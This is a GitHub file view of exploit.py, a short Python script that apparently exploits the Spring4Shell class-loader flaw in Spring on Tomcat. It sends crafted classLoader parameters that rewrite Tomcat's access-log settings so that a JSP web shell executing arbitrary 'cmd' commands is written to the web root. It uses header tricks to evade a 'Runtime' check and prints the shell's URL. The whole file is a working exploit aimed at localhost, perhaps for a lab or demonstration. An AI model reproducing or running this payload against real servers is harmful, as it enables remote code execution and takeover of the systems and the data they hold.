-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
41 lines (33 loc) · 1.58 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import requests
def run_exploit():
headers = {
"prefix": "<%",
"suffix": "%>//",
# This may seem strange, but this seems to be needed to bypass some check that looks for "Runtime" in the log_pattern
"c": "Runtime",
"Content-Type": "application/x-www-form-urlencoded"
}
log_pattern = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20" \
f"java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20" \
f"out.println(new%20String(in.readAllBytes()))%3B%25%7Bsuffix%7Di"
log_file_suffix = "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
log_file_dir = f"class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
log_file_prefix = f"class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell"
log_file_date_format = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
data = "&".join([log_pattern, log_file_suffix, log_file_dir, log_file_prefix, log_file_date_format])
try:
# Run exploit
requests.post("http://localhost:8080/example/exploit", headers=headers, data=data, timeout=15, allow_redirects=False, verify=False)
except Exception as e:
print(e)
pass
def main():
try:
print("[+] Running exploit")
run_exploit()
print("[+] Exploit completed")
print("[+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id")
except Exception as e:
print(e)
if __name__ == '__main__':
main()